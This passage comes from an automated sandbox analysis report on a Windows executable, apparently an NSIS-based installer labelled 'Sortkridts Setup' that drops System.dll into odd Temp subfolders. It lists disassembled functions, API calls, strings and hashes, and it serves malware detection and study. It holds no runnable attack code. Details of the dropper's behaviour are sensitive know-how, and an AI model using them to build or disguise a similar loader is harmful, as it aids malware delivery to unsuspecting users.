                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID: C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 542301482-1344943116
                                • Opcode ID: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                • Instruction ID: d428ad0e776067b9467a460b3bd0699ffb91532d5b811a166a6037c041011ccd
                                • Opcode Fuzzy Hash: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                • Instruction Fuzzy Hash: CA414A72604341AFC300EFA5C948A2BBBE9FF89314F10092EF695DB291DB79D805CB16
                                Function 00402B75 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                • Instruction ID: 66eca0b878d1a88cf031bc7713e4e99cd100193794d0d0043917bcbbabee6758
                                • Opcode Fuzzy Hash: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                • Instruction Fuzzy Hash: 37D0EC61414150E9D1606F718D49ABA736DAF05354F204A3EF196E10D1EAB85501932F
                                Function 004070FB Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                • Instruction ID: d4ac7d1497c90a7860cde27ccfdf49f9d4c0c6eb7f3b7e6fe9b2edbc2c979ebe
                                • Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                • Instruction Fuzzy Hash: 79C15B71A0C3918FD364CF29C48036ABBE1FBC5304F10892EE5DA9B391D678A546CB5B
                                Function 00404F6D Relevance: 52.9, APIs: 35, Instructions: 374windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAC
                                • ShowWindow.USER32(?), ref: 00404FD6
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FE7
                                • ShowWindow.USER32(?,00000004), ref: 00405003
                                • GetDlgItem.USER32(?,00000001), ref: 0040512A
                                • GetDlgItem.USER32(?,00000002), ref: 00405134
                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040514E
                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519C
                                • GetDlgItem.USER32(?,00000003), ref: 0040524B
                                • ShowWindow.USER32(00000000,?), ref: 00405274
                                • EnableWindow.USER32(?,?), ref: 00405288
                                • EnableWindow.USER32(?), ref: 0040529C
                                • EnableWindow.USER32(?), ref: 004052B4
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CB
                                • EnableMenuItem.USER32(00000000), ref: 004052D2
                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E3
                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FA
                                • lstrlenW.KERNEL32(004211D0,?,004211D0,00000000), ref: 0040532B
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                • SetWindowTextW.USER32(?,004211D0), ref: 00405343
                                  • Part of subcall function 00401399: MulDiv.KERNEL32(00000000,00007530,00000000), ref: 004013F9
                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                • DestroyWindow.USER32(?,00000000), ref: 0040538B
                                • CreateDialogParamW.USER32(?,?,FFBD62DF), ref: 004053BF
                                  • Part of subcall function 004054F5: SetDlgItemTextW.USER32(?,?,00000000), ref: 0040550F
                                • GetDlgItem.USER32(?,000003FA), ref: 004053E8
                                • GetWindowRect.USER32(00000000), ref: 004053EF
                                • ScreenToClient.USER32(?,?), ref: 004053FB
                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405414
                                • ShowWindow.USER32(00000008,?,00000000), ref: 00405433
                                  • Part of subcall function 004054C3: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004054D5
                                • ShowWindow.USER32(?,0000000A), ref: 00405479
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$Enable$LongMenuText$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                • String ID:
                                • API String ID: 3304020681-0
                                • Opcode ID: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction ID: 1b19c71cd4f81cfbd26a1cf5418529817e88c436646d4b9e8708edd60e3e664c
                                • Opcode Fuzzy Hash: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction Fuzzy Hash: C4D1C070601A11AFDB206F21ED48A6B7BA8FB48355F40453EF945B21F0CB399852DFAD
                                Function 00403D65 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 221windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • CheckDlgButton.USER32(?,?,00000001), ref: 00403E04
                                • EnableWindow.USER32(?), ref: 00403E11
                                • GetDlgItem.USER32(?,000003E8), ref: 00403E1D
                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E39
                                • GetSysColor.USER32(?), ref: 00403E4A
                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E58
                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E66
                                • lstrlenW.KERNEL32(?), ref: 00403E6C
                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E79
                                • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403E90
                                • GetDlgItem.USER32(?,0000040A), ref: 00403EEC
                                • SendMessageW.USER32(00000000), ref: 00403EF3
                                • EnableWindow.USER32(00000000), ref: 00403F10
                                • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F34
                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403F89
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00403F9B
                                • SetCursor.USER32(00000000), ref: 00403FA4
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00403FE6
                                • SetCursor.USER32(00000000), ref: 00403FE9
                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404015
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040402D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                • String ID: Call$N
                                • API String ID: 3270077613-3438112850
                                • Opcode ID: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction ID: 4fa98256382c23a77b640614663c001b7206c978ba46bfa2c34382a940cfe240
                                • Opcode Fuzzy Hash: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction Fuzzy Hash: A881B0B1604308AFD710AF24DD44A6B7BE9FF88345F41083EF641A72A1CB789945CF59
                                Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128COMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                • BeginPaint.USER32(?,?), ref: 0040104C
                                • GetClientRect.USER32(?,?), ref: 00401062
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                • DeleteObject.GDI32(00000000), ref: 004010FA
                                • CreateFontIndirectW.GDI32(?), ref: 00401120
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401143
                                • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                • DrawTextW.USER32(00000000,Sortkridts Setup,000000FF,?,00000820), ref: 00401171
                                • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                • DeleteObject.GDI32(?), ref: 0040117F
                                • EndPaint.USER32(?,?), ref: 0040118E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F$Sortkridts Setup
                                • API String ID: 941294808-185700202
                                • Opcode ID: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction ID: d36771556e1314171d00f7341d5a6d6cd4ef22ea24e197e6f7dda2bcd3f0aae3
                                • Opcode Fuzzy Hash: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction Fuzzy Hash: 3041AD720083509FC7159F65CE4896BBBE9FF88715F150A2EF9D1A22A0CA34C904CFA6
                                Function 004062E1 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,?,00406239,?,?), ref: 0040631C
                                • GetShortPathNameW.KERNEL32(00000000,00426E48,00000400), ref: 00406325
                                • GetShortPathNameW.KERNEL32(?,00426648,00000400), ref: 00406342
                                • wsprintfA.USER32 ref: 00406360
                                • GetFileSize.KERNEL32(00000000,00000000,00426648,C0000000,00000004,00426648,?), ref: 00406398
                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063A8
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063D8
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426248,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063F8
                                • GlobalFree.KERNEL32(00000000), ref: 0040640A
                                • CloseHandle.KERNEL32(00000000), ref: 00406411
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %ls=%ls$HfB$HnB$[Rename]
                                • API String ID: 2900126502-165592708
                                • Opcode ID: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                • Instruction ID: 28d4088f706ad7906ef0a9a5075647bec21de1d5f4d95c1c1de34b852c29caff
                                • Opcode Fuzzy Hash: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                • Instruction Fuzzy Hash: 9431E5B12002217BD6206B359D49F7B3A5CDF81748F56443EF942BA2C2DA7DD8624A7C
                                Function 00402BA3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102memoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                • GlobalFree.KERNEL32(?), ref: 00402C7E
                                • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll, xrefs: 00402CD3
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 2667972263-204022868
                                • Opcode ID: 6ffc5b8a9f87e2e5b40759ba5e904c63f1369c7a02dc5e0df68b7fff71cda799
                                • Instruction ID: 686b8f33fe839f6b04a80afc83e47d853b1ea01e990ec980acb486ddfed3f61f
                                • Opcode Fuzzy Hash: 6ffc5b8a9f87e2e5b40759ba5e904c63f1369c7a02dc5e0df68b7fff71cda799
                                • Instruction Fuzzy Hash: 1E310871408351ABD310AF658E49E1FBBE8AF89754F114A3EF590772D2C77888018B9A
                                Function 00406D18 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406D8D
                                • CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DA1
                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DB9
                                Strings
                                • *?|<>/":, xrefs: 00406D7C
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D1F
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D18, 00406D1A
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                • API String ID: 589700163-2188270913
                                • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction ID: 6d5cd2c23b7c5e8a6660ed42317bbe46aa043e331069955b4164b8205da208bc
                                • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction Fuzzy Hash: 9E11D261B0063556DA3067298C4097B72E8DFA97A1756443BFDC6E72C0FB7C8CA193AC
                                Function 00405736 Relevance: 12.1, APIs: 8, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction ID: fd6d678b7fcced70b4665a1fbec2e56912b3eb02c270adc19d2dd25120f6a122
                                • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction Fuzzy Hash: 4B21F675500B04DFDB749F28DA4895B77B4EF05710B108A3EE896B26A1DB38E814CF24
                                Function 00405D15 Relevance: 10.6, APIs: 7, Instructions: 76stringwindowCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                • lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                • lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                • SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                • SendMessageW.USER32(00000000), ref: 00405DB3
                                • SendMessageW.USER32(00000000,0000104D,00000000,?), ref: 00405DCE
                                • SendMessageW.USER32(00000000,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                • String ID:
                                • API String ID: 1759915248-0
                                • Opcode ID: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
